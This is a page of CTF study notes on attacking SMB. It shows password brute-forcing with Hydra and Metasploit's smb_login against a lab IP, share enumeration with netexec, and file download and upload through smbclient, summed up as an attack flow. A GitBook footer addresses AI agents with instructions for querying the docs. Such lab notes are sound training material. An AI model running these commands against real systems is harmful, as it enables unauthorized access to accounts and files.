> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/network-services/smb.md).

# SMB

## Cracking SMB

### What is SMB

Server Message Block — Windows file sharing protocol. Used for shared folders, printers, and inter-process communication. Port 445.

* Also known as **CIFS** (Common Internet File System)
* Linux equivalent = **NFS**
* Open-source implementation = **Samba**

***

### Brute-force with Hydra

```bash
# SMB only allows 1 parallel task
hydra -L user.list -P password.list smb://10.129.42.197
```

#### If Hydra gives `invalid reply` error

Hydra can't handle SMBv3. Use Metasploit instead:

```bash
msfconsole -q

use auxiliary/scanner/smb/smb_login

set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
set stop_on_success true

run
```

***

### After finding credentials

#### Enumerate shares

```bash
netexec smb 10.129.42.197 -u "user" -p "password" --shares
```

Example output:

```
SMB  10.129.42.197  445  WINSRV  [+] WINSRV\user:password
SMB  10.129.42.197  445  WINSRV  Share        Permissions
SMB  10.129.42.197  445  WINSRV  ADMIN$
SMB  10.129.42.197  445  WINSRV  C$
SMB  10.129.42.197  445  WINSRV  SHARENAME    READ,WRITE
SMB  10.129.42.197  445  WINSRV  IPC$         READ
```

#### Browse a share

```bash
smbclient -U user \\\\10.129.42.197\\SHARENAME

# Inside smbclient
ls                   # list files
get <filename>       # download file
put <filename>       # upload file
cd <directory>       # change directory
```

***

### Attack Flow

```bash
# Step 1 — brute-force
hydra -L user.list -P password.list smb://10.129.42.197

# If invalid reply error — use MSF
msfconsole -q
use auxiliary/scanner/smb/smb_login
set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
run

# Step 2 — enumerate shares
netexec smb 10.129.42.197 -u "user" -p "password" --shares

# Step 3 — browse target share
smbclient -U user \\\\10.129.42.197\\SHARENAME
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/network-services/smb.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
